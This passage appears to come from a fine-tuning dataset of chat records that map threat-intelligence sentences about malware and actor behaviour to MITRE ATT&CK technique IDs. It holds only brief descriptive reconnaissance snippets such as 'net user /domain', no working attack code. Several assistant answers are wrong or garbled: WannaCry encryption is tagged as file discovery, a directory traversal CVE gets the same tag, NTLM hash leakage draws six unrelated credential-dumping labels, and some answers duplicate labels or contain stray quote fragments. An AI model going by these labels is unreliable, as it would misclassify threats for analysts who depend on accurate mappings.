{ "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exfiltrated files stolen from local systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once a removable media device is inserted back into the first victim, collects data from it that was exfiltrated from a second victim." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch/? search/? find/? results/? open/? search/? close/? XAgent also will choose several parameters names from the following list when finishing the construction of the C2 URL: itwm= text= from=" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HALFBAKED can obtain information about running processes on the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can run as a service using svchost.exe." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used various tools to download files, including DGet (a similar tool to wget)." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user’s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups" }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has deployed privileged containers that mount the filesystem of victim machine." }, { "role": "assistant", "content": "T1611 - Escape to Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat actors compromise a website used by their target demographic (e.g., compromising a website specializing in oil and gas industry news when targeting the energy vertical)" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Orz can overwrite Registry settings to reduce its visibility on the victim." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This presentation by Christopher Glyer and Devon Kerr contains additional information on attacker use of WMI in past Mandiant investigations" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used PsExec to deploy beacons on compromised systems." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to list processes on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BACKSPACE uses HTTP as a transport to communicate with its command server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook is capable of taking an image of and uploading the current desktop." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CVE-2014-4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses PowerShell to add a Registry Run key in order to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet has the ability to obtain a victim's system name and operating system version." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex has used code signing certificates issued to fake companies to bypass security controls." }, { "role": "assistant", "content": "T1588.003 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec is capable of using HTTP and HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon can use a dynamic Windows hashing algorithm to map API components." }, { "role": "assistant", "content": "T1027.007 - Obfuscated Files or Information: Dynamic API Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dacls can scan directories on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive’s recycle bin" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Explosive has collected the computer name from the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives" }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. 's backdoor also enables remote attackers to modify and delete subkeys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. has also used WMIC during and post compromise cleanup activities." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information. The tool runs the following list of WMI queries" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can’t be directly decoded with Base64 decoding" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Looking into the arguments shows that the process plugin comes from the received packet to execute functions such as collecting process information, running a new process, and terminating a running one. The process information collected includes the username, user ID, group ID, and process parent ID of the target process" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore uses VBS files." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used batch scripts in its malware to install persistence mechanisms." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint can uninstall the malicious service from an infected machine." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has executed JavaScript scriptlets on the victim's machine." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RGDoor executes the \"whoami\" on the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the malware executes the extracted install.bat script before deleting the original files and exiting" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 kills and disables services for Windows Security Center, and Windows Defender." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron can be configured to exfiltrate data during nighttime or working hours." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used obfuscated PowerShell scripts for staging." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon contains base64-encoded strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The files are encrypted with a randomly generated 128-bit AES key in CBC mode with a NULL initialization vector. The key is generated per file, is encrypted with the generated RSA public key, and included in the encrypted file header. Each file encrypted by the malware starts with the string WANACRY. and has the WNCRY extension. Depending on the file properties, the malware may also stage files in a WNCRYT extension" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sifo – Collect victim system information - drive – List drives on victim machine - list – List file information for provided directory - upload – Upload a file to the victim machine - open – Spawn a command shell" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware)." }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses and other Active Directory utilities to enumerate hosts." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, this Trojan checks to see if it was configured with “BINDERON” to determine if it should extract an embedded payload from a resource named “B”, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper can decompress and copy driver files using `LZCopy`." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware names itself \"svchost.exe,\" which is the name of the Windows shared service host program." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIVEHANDS uses an embedded NTRU public key. This NTRU key is SHA512 hashed and the first 32 bytes are used as the victim ID within the ransom note. This NTRU pubic key is also used to encrypt each file's symmetric key. For the symmetric key, FIVEHANDS uses an embedded generation routine to produce 16 random bytes used for an AES key to encrypt each file. After each file is encrypted, the original file size, magic value of DE C0 AD BA, and AES key are encrypted with the public NTRU key and appended to the file. The four magic bytes DB DC CC AB are appended to the end of the encrypted file. FIVEHANDS includes additional code not found in DEATHRANSOM and HELLOKITTY to use the Windows Restart Manager to close a file currently in use so that it can be unlocked and successfully encrypted" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon can download an executable to run on the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file." }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has used base64 encoding to hide command strings delivered from the C2." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "macOS.OSAMiner has used `ps ax | grep | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a keylogger component." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors used the following commands following exploitation of a machine with malware to enumerate user accounts: net user >> %temp%\\download net user /domain >> %temp%\\download" }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used batch scripts and scheduled tasks to delete critical system files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses." }, { "role": "assistant", "content": "T1568.001 - Fast Flux DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves is launched through use of DLL search order hijacking to load a malicious dll." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SharpStage can execute arbitrary commands with PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom encryption algorithm on data sent back to the C2 server over HTTP." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZLib has sent data and files from a compromised host to its C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness was related to values listed in newer BlackEnergy configuration files. As described in Dmitry’s 2010 Black DDoS’ analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual ‘ddos’ plugin listing. Displayed below are these new, xml formatted plugin names “weap_hwi”, “ps”, and “vsnet” in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as “version 1”, including the ddos plugin" }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX can use RC4 encryption in C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADCALL collects the computer name and host name on the compromised system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity." }, { "role": "assistant", "content": "T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As you can see from the VBScript file, the commands in the script are invoked using the wscript shell. It does two things: it creates a “RunOnce” key in the registry so that the VBScript is executed each time the user logs on the machine (indicating persistence) and second, the VBScript runs the executable file “firefox.exe" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an 